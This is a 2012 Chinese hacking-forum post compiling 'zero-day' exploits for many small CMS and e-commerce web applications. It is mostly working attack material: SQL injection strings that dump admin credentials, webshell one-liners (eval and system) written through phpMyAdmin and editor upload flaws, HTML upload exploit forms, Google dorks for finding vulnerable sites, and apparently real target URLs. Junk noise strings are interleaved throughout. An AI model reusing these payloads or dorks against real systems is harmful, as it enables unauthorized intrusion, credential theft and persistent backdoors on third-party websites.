中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
, W' L6 N- ]( ^0 }' j2 `2 Z6 z
, } _' l9 I% t- \9 Z/ J$ Q Y
直接上exploit:
6 S: P) ^9 w( b: g+ {7 E3 |) N
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
# [$ o7 A+ U) Q# j5 L3 i& O: d$ k- ~
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
. ~# f' D- o2 o" w) G6 q2 r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ m) B [ J0 I7 j
Asprain论坛 注册用户 上传图片就可拿到webshell
. O' n) T6 n; X; D+ G
4 b3 @5 t8 X* t- M
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
8 z( Y! K: J5 j: M
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
8 g( E2 I1 o J% I) M7 W3 F- ]
2.gif 为一小图片文件,一定要小,比如qq表情图片
6 P/ s* q/ m, \0 o% z
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
; K$ T# f" g7 t4 o
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
) B& X' N! G7 v
5.q.asp;.gif
2 V6 Y* T9 j: s3 T
google:Powered by Asprain
* t( `9 q8 h. O& n3 b" j5 w! `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# n3 _3 x! @" }) z/ E5 N
5 C, S. `7 I2 e6 A
ShopNum1全部系统存在上传漏洞。
7 D8 v. ~4 ?; F) l; u
7 ^% n g9 n |, w/ N
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
" S) ]6 ^* |$ O2 _# O) ]
按说明 提示登录后台。。
6 {8 h# i+ Z6 ^6 d/ m
在后台功能页面->附件管理->附件列表
0 Y f; J( S7 j% \
可以直接上传.aspx 后缀木马
$ e( x' `; a: Q: B
http://demo.shopnum1.com/upload/20110720083822500.aspx
- _; Y+ e5 K5 j8 Y6 v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 U* Y2 K( b, y5 r5 I
3 O) y6 ], f2 u. g5 Q
牛牛CMS中小企业网站管理系统 上传漏洞
7 h) m9 o' \: f, V3 o" p: L4 C
) \& [+ Q Y# c' m2 I/ S& x; F
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
) j- U; @+ Y% @1 [2 {
后台:admin/login.asp
4 _3 a8 `" z* d% u" Z6 m) X
ewebeditor 5.5 Nday
6 H) S4 Y. g4 }; ~
exp:
" U3 C) X+ h( T& X/ u
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
; J+ b! H; m, f
<input?type=file?name=uploadfile?size=100><br><br>?
$ ~ x" h$ _( F3 W- ]
<input?type=submit?value=upload>?
4 @6 P# U/ i" a0 T- {2 O
</form>
; L I# L# ~4 D9 m/ k
ps:先上传小马.
& ^8 e% F- Q. y2 V+ C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
- K0 R& M3 D4 q2 d
. X' x( D4 M0 d8 {* ^: A. R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 J& a3 a1 Z) K- b q4 \
5 X% S$ L' J" ^- g) m/ @
YothCMS 遍历目录漏洞
2 Q7 J- E2 z+ V8 W
! D6 Z Q+ @3 U1 `6 R' q+ y
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
. H( ?" ? x5 Z" [
默认后台:admin/login.asp
7 H2 L. K+ Y% m" O+ C8 W
遍历目录:
; D4 o7 k) e W
ewebeditor/manage/upload.asp?id=1&dir=../
$ `8 E& p* y4 H
data:
" D5 l6 B, a5 n6 k, K; L8 z
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
, }1 s) S5 ~( W! f$ f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 w8 F) }+ d/ R' X8 Z( @) M
# Z( Q. B8 u u( \
Net112企业建站系统 1.0
5 C" `: o9 A6 n9 T% o6 @
/ A8 |# M9 |4 h5 Z' @! O
源码简介:
e' A" v. u* E- o0 V B9 \" L
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
9 \5 ~) ]- L6 G' q( `& X
添加管理员:
. N4 P. L e3 R) L3 O
http://www.0855.tv/admin/admin.asp?action=add&level=2
; e* N% l) [' {
其实加不加都不是很重要,后台文件都没怎么作验证。
3 k, O3 f- h( o3 L* Q
上传路径:
2 L& o+ n ]3 _2 n5 s8 [
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
; E1 X% \! N# @, x; L5 E$ r
http://www.0855.tv/inc/Upfile.asp?Stype=2
9 {# g5 w1 I- n$ v; E/ _! s
怎么利用自己研究。
7 K$ s- h9 G0 r+ T1 } n
遍历目录:
. f% `, V& N; `/ |; F/ E6 M/ U2 q
http://www.0855.tv/admin/upfile.asp?path=../..
) n# W' K1 V: l+ _( o* \
如:
' ?! V; f! c+ I9 {0 _ U
http://www.0855.tv/admin/upfile.asp?path=../admin
: F$ f9 P/ q9 G5 w: ^' _
http://www.0855.tv/admin/upfile.asp?path=../data
: A: O" h5 S$ Q4 e7 o5 {
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, _& w- n0 w" G" k( u* K/ ^ q
- N/ p4 d3 ~: o) m9 Y. ^
易和阳光购物商城通杀 上传漏洞
/ L; n) |3 A& k; c
+ \7 `. t$ }$ s6 A4 H" N
前提要求是IIS6.0+asp坏境。
k) |' r# }, x3 @8 \# m
漏洞文件Iheeo_upfile.asp
+ {7 C' Z6 W0 l3 [" Y
过滤不严.直接可以iis6.0上传
$ ]5 P2 p& z0 k( K' E% Z5 O
把ASP木马改成0855.asp;1.gif
& Q @( N) W5 [: q* Y
直接放到明小子上传
8 ~! {# d2 J2 g4 A
Google搜索:inurl:product.asp?Iheeoid=
9 D/ c! s& n7 g) J; A$ z% L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. v/ B/ P$ Y. R% m: B
8 Y) a7 `* | G6 @4 D+ X( H
phpmyadmin后台4种拿shell方法
' [: C% h1 Z$ v7 z$ t2 _
% W8 a/ Z- t5 w" U7 e, P# {
方法一:
' {0 m' y& s: l( F9 }6 U
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
. H6 p5 c2 [! B' X5 Y ?
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
+ @3 S' y) D& ^( B" Q
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
z" T! T p$ T o& K
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
2 X, L- t& M1 c K% g$ {
一句话连接密码:xiaoma
9 I, V, L7 L, B* D
方法二:
" `' U( Y& h$ U5 R% C& ?
Create TABLE xiaoma (xiaoma1 text NOT NULL);
0 I# P) i- W& U. _- }. Q
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
' @! w: [& m8 R& V
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* P5 V6 b0 C J# y- }
Drop TABLE IF EXISTS xiaoma;
# O+ {/ Z7 o3 G) H
方法三:
# M t! d( @1 Q" k2 Y# S
读取文件内容: select load_file('E:/xamp/www/s.php');
1 E8 f k) O' F! \7 c
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 }4 U3 i$ X& U/ U) w6 l1 `
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
) S& C5 N3 L4 O2 L. j! n
方法四:
+ b" i- t! y2 G' p) J
select load_file('E:/xamp/www/xiaoma.php');
( q9 l" s/ g2 M
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: c( d* i- e4 G
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
. h; ^ |8 q# m: Z$ N" C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: x9 d6 m2 n( e
. Y6 r( D! y; }# z! w
传信网络独立开发网站源码0day漏洞
0 v; h6 Q- p4 G& W* b5 b6 \) w
$ K( Q. ? D, B
后台system/login.asp
% s" T% ?: d8 {$ O7 P& d
进了后台有个ewebeditor
7 ?4 S3 o6 O3 A* G
Google 搜索inurl:product1.asp?tyc=
0 \& A; J2 A% b
编辑器漏洞默认后台ubbcode/admin_login.asp
% e+ g* ?( e* B6 b; a- W" a
数据库ubbcode/db/ewebeditor.mdb
; {4 i& P# S' _0 A6 s
默认账号密码yzm 111111
# i/ | n5 y+ t3 N
$ ~! \( [# n7 x7 }$ s! ]
拿webshell方法
6 K; X x% E" |6 n, C8 W; {
登陆后台点击“样式管理”-选择新增样式
0 o# t4 M% k# j! _* l
样式名称:scriptkiddies 随便写
: Y% T+ E5 ?/ |; C4 w! U, `
路径模式:选择绝对路径
) W& p- L6 G- }5 g
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
+ r$ e( o" z8 [. _# k" J
图片类型比如就是我们要上传的ASP木马格式
" v) W \& K0 s6 `
上传路径:/
8 p2 @8 l* |- K" b
图片限制:写上1000 免的上不了我们的asp木马
8 q- x: P# T+ B- e* C
上传内容不要写
4 k' z1 X; r+ J8 ?; d/ D o9 s' o9 _
可以提交了
' V6 d* Y* O3 m$ Z; y6 a( N
样式增加成功!
7 J) s1 j( p) {7 U8 i8 x# ^
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
5 }. \+ i: d0 k/ G2 q
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
( t6 T. v: Y2 Y
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
8 F9 X) X& I5 F, `: B$ m- }
上ASP木马 回车 等到路径
3 Y+ V: K4 V; t4 Q: l9 \. p
- {) O O; d: j* ^
后台:system/login.asp
5 P* y2 o" U1 m+ F- S: A4 |
Exp:
8 T1 e! @2 m% o& m+ q
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: ~& |% L2 `4 ` X
测试:
1 r) l K F7 |4 L5 @
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
" T9 [& Q) \5 O g2 ~& p8 O
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& c- k z3 J7 P% x; l+ x1 H/ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! X) T$ `) x$ S2 G" G5 h
# @+ V3 d) t* W1 @
foosun 0day 最新注入漏洞
" e3 D- U8 V; I9 ^
1 `( A2 @5 f. Z: \2 J! H
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
$ F0 h5 W% \' P7 {5 D0 p- \
利用简单的方法:
7 A. P3 O/ p0 Q; J" v" f3 |
暴管理员帐号:
8 L! g" ~0 U( ~/ P% X
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
& _8 Z6 T7 {6 d1 l! B
暴管理员密码:
7 H+ W {7 ^: E( A' z
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
: U/ @. k8 R R4 G9 X6 m; ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* v( h- c' Y% R/ b# ]
+ y. F3 N4 f4 s1 q/ Q4 J: ?
网站程序的版权未知!
8 M- D. w4 |! k0 j) x7 K
9 w" D' i2 I0 w6 Z" p* g
默认网站数据库:
$ j# W( |& d7 D5 q
www.i0day.com/data/nxnews.mdb
9 L( }; s; m: ~. o
ewebeditor 在线编辑器:
% U7 E) m( d% L o, g3 t7 S( S
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
$ f, o$ L0 s# E( Y, y0 I8 r5 ?
登录地址:ewebeditor/admin_login.asp
* U R& y' q! K. L. L
默认密码:admin admin
& Y. ?7 Z9 _# P; J _+ {
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
6 F2 y& n' s9 P) w+ }
/ q! U$ A3 w. I$ f- ^" E2 E
Sql注入漏洞:
/ `! W& n7 h' e
http://www.i0day.com/detail.asp?id=12
- d7 F- f& I8 V |
exp:
) f$ P/ e3 f X$ s I
union select 1,admin,password,4,5,6,7,8 from admin
$ T w7 }2 m+ ?) y
爆出明文帐号/密码
+ g: Q q/ O' V- n
! K( v0 a2 b& k: \4 }
上传漏洞:
/ M9 G/ i/ _+ f# f5 z/ u! X
后台+upfile.asp
) L6 ?4 q; I M/ v2 Z& }
如:
7 S% {& B W7 X, b' Z v+ @
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
" a# j9 C1 P8 O. |$ k: n! o4 Z
shell的地址:网址+后台+成功上传的马
. d7 L2 X+ [6 c# t
google:inurl:news.asp?lanmuName=
t4 }( n6 {* {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# i3 _ G4 o: z
0 e, E4 z, X% L# A a$ i* _/ v9 F
dedecms最新0day利用不进后台直接拿WEBSHELL
1 v* E+ v U3 J. S4 I9 i& I
- v2 V$ _$ f6 z8 I/ o& D4 l
拿webshell的方法如下:
9 S; x& w% Q( ]7 i
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
; F0 R( K9 G$ f( g8 C
前题条件,必须准备好自己的dede数据库,然后插入数据:
$ ~7 l" r3 b) G/ s
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
: A* k! ]; b4 t1 q$ ?) i
0 d0 ]- H! a, M; n) U, V& @
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
+ [3 y+ }2 ^' Z" W9 C# T+ M
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
9 v. k6 t1 q) M5 n6 M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
0 V1 P" A; v( v4 E- H+ O; O
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
% X9 n9 m4 x0 E
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ V3 A7 ^) P( N+ E5 m! U8 E6 O
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
`- u9 \2 K9 M. b( {# K
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
0 B& i. \2 x7 D! p( h
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
( D7 g; }7 T2 b: C1 m2 e% I
<input type="text" value="true" name="nocache" style="width:400">
4 j4 X+ B( R- [
<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 N1 S3 v! x% l" r; Y
</form>
1 B, O; a' ^0 B
<script>
+ R- F# g( I' z" C5 ~
function addaction()
5 \2 F4 X) @. G. v" K1 n
{
o; ^: ^+ X& i1 |2 r* g# f/ C: e
document.QuickSearch.action=document.QuickSearch.doaction.value;
9 S+ _( W- U3 o0 y" @+ @, ]
}
( W8 ~7 Y0 I `9 y
</script>
! @; K. E: P+ s B. x: P- A# H5 Y
-----------------------------------------------------------------------------------------------------------------------------------------------
# } }6 R v' q/ p* n/ ?1 V
9 R% j3 |) Q% {% J
dedecms织梦暴最新严重0day漏洞
# R* H+ u2 g% ?9 {- g
bug被利用步骤如下:
2 ~; f8 w% Z4 M- B
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, i, I6 ~. |- L/ B/ T& y5 R7 H' z
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
2 l; \, J- @1 ]+ K1 {
-------------------------------------------------------------------------------------------------------------------------------------------
( {" h+ N1 i! S& B2 P
( s$ [/ ~# `+ O
多多淘宝客程序上传漏洞
0 |) Z( _- I* ~! }
漏洞页面:
/ }9 x3 `( x. R6 D, C0 U
admin\upload_pic.php
; \+ @ c! o2 D) q: v% C
传送门:
! u* o' d; m! p, v8 i' q. V
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
2 C! U/ j6 n- D7 G0 N
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- D) p& q5 ]9 b0 P7 U, `5 [5 J3 c5 C
------------------------------------------------------------------------------------------------------------------------------------------------------
, m# y# B- S" E0 Z0 h
2 r* U2 @0 M5 |5 `
无忧公司系统ASP专业版后台上传漏洞
4 C7 Y. w" p5 O( J
漏洞文件 后台上传
/ f0 u/ G) ~+ m( z2 D( [
admin/uploadPic.asp
& K5 x6 S6 J( e5 o; k
漏洞利用 这个漏洞好像是雷池的
& G t/ I7 [/ T7 _9 y" y
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
0 ]' Y( E9 T9 W, p' W2 r2 l
等到的webshell路径:
5 F+ v4 A; e2 O f+ s& A" P
/UploadFiles/scriptkiddies.asp;_2.gif
+ S4 k4 j; d7 {
---------------------------------------------------------------------------------------------------------------------------------------------------
! _5 T& @3 O2 V, \7 ?0 `7 |# e
- ?' T6 ?6 I: z
住哪酒店分销联盟系统2010
$ u+ N" ^- U, [( q
Search:
( A# A% B% I- t: F
inurl:index.php?m=hotelinfo
2 N9 ]5 Y) p$ o8 U) Z
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
* C* z5 l% y; D5 w! N1 c7 \4 r: i3 o
默认后台:index.php?m=admin/login
1 H: ]- H6 d* w! [ V5 i6 `6 w
--------------------------------------------------------------------------------------------------------------------------------------------------
' h9 n. ~+ \. S7 c5 k6 O U
$ w' X# H. d9 ^+ _9 \, x3 m
inurl:info_Print.asp?ArticleID=
5 y) ~+ p! }/ C
后台 ad_login.asp
5 O6 b }6 _; w# R
爆管理员密码:
, [- f1 ]9 G( V5 K% n* z
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
! E3 h( M. e. B( D: N a: }1 ]$ ~
------------------------------------------------------------------------------------------------------------------------------------------------------------
5 T' g6 Q3 o; ]/ s+ y4 d
" n1 B/ J7 }: e. W% K* x
搜索框漏洞!
6 x, H; q& c: B2 i$ Q! ]0 g4 \
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
]' m9 t7 N" F+ k7 h
--------------------------------------------------------------------------------------------------------------------------------------------------------
) R8 f* g; V+ o* ]+ J
! Q T; R2 V) v0 F, R1 {
关键字:
" H! l% r- q: [7 T
inurl:/reg_TemletSel.asp?step=2
# U3 t# _7 g. ?& X% L; G/ q
或者
% C2 j. [. v( E
电子商务自助建站--您理想的助手
" C& e- I$ W' u( d* ]
-------------------------------------------------------------------------------------------------------------------------------------------------
8 C6 j/ l5 [( y- A2 O! T* Z
. S" w% T- X: `* n$ y; B
iGiveTest 2.1.0注入漏洞
/ ?* F+ C2 w1 {2 @5 {
Version: <= 2.1.0
* A9 L _ Z: j" m, Z" D2 u+ l$ O
# Homepage:
http://iGiveTest.com/
4 y7 ^" C" f8 V5 g q( |9 e
谷歌关键字: “Powered by iGiveTest”
( v: a5 n$ w5 `$ g6 {5 i* q
随便注册一个帐号。然后暴管理员帐号和密码
1 c! Y! E: u8 X/ ~2 n3 k% |3 A
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
3 h( s( _" j6 ], p
------------------------------------------------------------------------------------------------------------------------------------------------
8 v. s. v3 W# d7 l; i7 b6 N4 O
3 k G# ?' {% @+ N2 P, y# o
CKXP网上书店注入漏洞
% p6 b* a5 @" Q5 t h3 N5 L0 j
工具加表:shop_admin 加字段:admin
8 ~) }* Y- u& o# D0 X
后台:admin/login.asp
+ j; S- }/ x1 e
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
5 P! p4 [$ S0 @: @0 Y' H/ f+ V, B
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
: @& A" r7 Q- Z @0 V$ l$ Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- f2 }0 h( [* |
& ]. `6 d. D" y8 q6 P/ G7 R: G
段富超个人网站系统留言本写马漏洞
) N. B3 g: |/ c: d
源码下载:
http://www.mycodes.net/24/2149.htm
5 l! y& P# K2 a* `
addgbook.asp 提交一句话。
4 E( w: z6 ^% M7 H
连接:
http://www.xxxx.tv/date/date3f.asp
" a0 O5 k3 D/ N% s/ Q
google:为防批量,特略!
" P: `+ ^& j, r: O: R
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ l+ Q) ^- r$ h6 ?# X) a+ ]
* A/ l5 }0 l9 ^% Y/ S
智有道专业旅游系统v1.0 注入及列目录漏洞
4 `% ^ ^, r( e: b U
默认后台路径:/admin/login.asp
' e) v5 e; [4 ]# i( L2 i+ d
默认管理员:admin
9 N1 L1 |0 s9 U, w
默认密码:123456
( T/ q2 j1 w. M' c
SQL EXP Tset:
0 } Y7 Q' U" V
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
! E7 |. t$ k# ?. Q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- d' k$ o+ Q: S: L7 P: p
* E @0 A. K! c3 d' \
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
, z* ~, A, a$ |2 X0 P6 ^
EXP:
9 F5 j, e9 k: y$ h
<title>eWebeditoR3.8 for php任意文件上EXP</title>
9 a! q, b, E. Y e# M. x8 n
<form action="" method=post enctype="multip
; T+ T+ J% t7 E/ a
art/form-data">
- d4 d( \$ L4 \4 B( G, V
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
A; t! l. r. L
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
/ o8 o6 d" j4 y
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
. J J$ U( }3 {, t5 V0 g4 _/ s
file:<input type=file name="uploadfile"><br>
% I" X k" z; | Q7 T0 V0 D' `* n [
<input type=button value=submit onclick=fsubmit()>
! j& I/ g) e* e. e' }* N. V7 h
</form><br>
2 o6 d( @1 T% Y8 t3 i) M
<script>
; }5 e. Z) R5 u' k7 J
function fsubmit(){
" M) J$ b. b2 ~+ F9 N* U8 \
form = document.forms[0];
' G L1 g e! B3 i7 ?
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 A* ]8 C$ Y/ D( F. k
alert(form.action);
! \. `" r- G) m! q m' O; U
form.submit();
; s, k; I, ]' N) }0 s' b6 Z
}
/ j9 @; l8 i2 T# Z. \. @
</script>
2 F; k7 o) Z3 e9 b1 U' @' ^ Y
注意修改里面ewebeditor的名称还有路径。
+ I; b# I2 Q* G
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 k4 t$ ]; F' ~5 j( v# O- I. s" R
8 d% {8 q. p% P1 ~8 L
提交’时提示ip被记录 防注入系统的利用
9 M7 ]& _" a$ E7 w9 Y, s
网址:
http://www.xxx.com/newslist.asp?id=122
′
! Y* T- S5 t* z, b. @2 ^% W. ^
提示“你的操作已被记录!”等信息。
6 `( c l/ ^, I+ q0 o
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
4 F) G c5 H7 c( o( h! [& g+ G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 E' T" T) ~$ q4 @
$ e( @: g+ \6 N+ A' Z- K
西部商务网站管理系统 批量拿shell-0day
. n0 p0 K' B! g- t
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
: B' V% _7 V- l# g
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
q3 ^2 w9 q6 ^$ A* c: w
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 X* d4 h9 P& e1 [3 a% } A
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
. A* Q5 H# T8 X/ U
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 ]% v; a4 ], v0 |7 X
+ P# n, i' x3 A B, e+ O' J
JspRun!6.0 论坛管理后台注入漏洞
) R' w1 R4 _/ _% f* w- E
$ F7 w) z+ t8 Q: |& A
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
/ h; @0 c: t4 Q% _ k
JspRun!6.0
; {) [; d- {4 @
漏洞描述:
7 n- V* J; w9 P! x G+ D9 }8 p
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
. C# r: A7 U* ?1 z* p
在处理后台提交的文件中ForumManageAction.java第1940行
8 ]$ R3 ~. S( x5 x
String export = request.getParameter("export");//直接获取,没有安全过滤
/ Z( C6 T! A2 V6 P* D) L6 C
if(export!=null){
6 w7 y. T0 P# o, o0 K, F! d
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
- _ X) N' e( I) {+ b: n
if(styles==null||styles.size()==0){
* i. z. ~2 ^( `( O/ O
<*参考
, f& D; R% z$ U6 G6 K h) _
nuanfan@gmail.com
) J9 Q' E% c! G; {$ @' a: S/ u' D
*> SEBUG安全建议:
8 d# S& `# H8 m# C6 \4 W
www.jsprun.net
2 U+ k ~( D0 s. N7 I6 V# P' p' _
(1)安全过滤变量export
$ I/ Y/ n. J3 F: @
(2)在查询语句中使用占位符
+ I7 h& f: m K0 E; _
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 a3 J3 z+ K8 i
4 q# Z, X" @. f6 u* e- B X! [
乌邦图企业网站系统 cookies 注入
. W) H4 T, _( q; K( p: H' @
v" V# X( l H& E1 H3 {# ]
程序完整登陆后台:/admin/login.asp
0 M/ U4 W4 i4 ~5 K9 f
默认登陆帐号:admin 密码:admin888
: [; Z8 f1 T' A& u3 T8 l. M5 h, k
语句:(前面加个空格)
# b2 j9 k* w j, ]$ {& |
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
6 d$ l2 w. r$ k T( E8 Z
或者是16个字段:
! d, [ B* g6 [ D# A8 Z( V* I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
* L9 B" m0 M) i; N% q" W
爆不出来自己猜字段。
& L) r4 U) }6 B9 s( _
注入点:
http://www.untnt.com/shownews.asp?=88
0 U, c3 `1 c# ^/ t
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
* L8 x& v' l0 ?& ]9 K6 i% O
关键字:
9 Z6 G% y3 h$ h; m' c3 T
inurl:shownews?asp.id=
) M* |9 ^. b; [" e: h c" k
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 h4 V+ ]% ^) `, D9 [1 `
4 ~9 K9 K5 h. ?
CKXP网上书店注入漏洞
8 G( _( m2 U, U% W4 M, l1 w% a
3 N1 h8 }0 R6 f2 u
工具加表:shop_admin 加字段:admin
6 e2 l# |5 n) b" R* n6 j
后台:admin/login.asp
' _- d4 V2 a$ h- a! y0 \
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
& ]! R S% R, L Q; v3 y
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
( D; M. B7 O" q: |6 i, K9 @
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( e* ^" d& h" `+ `
2 K5 `! T# U; |; F1 U; Q% C) F+ W
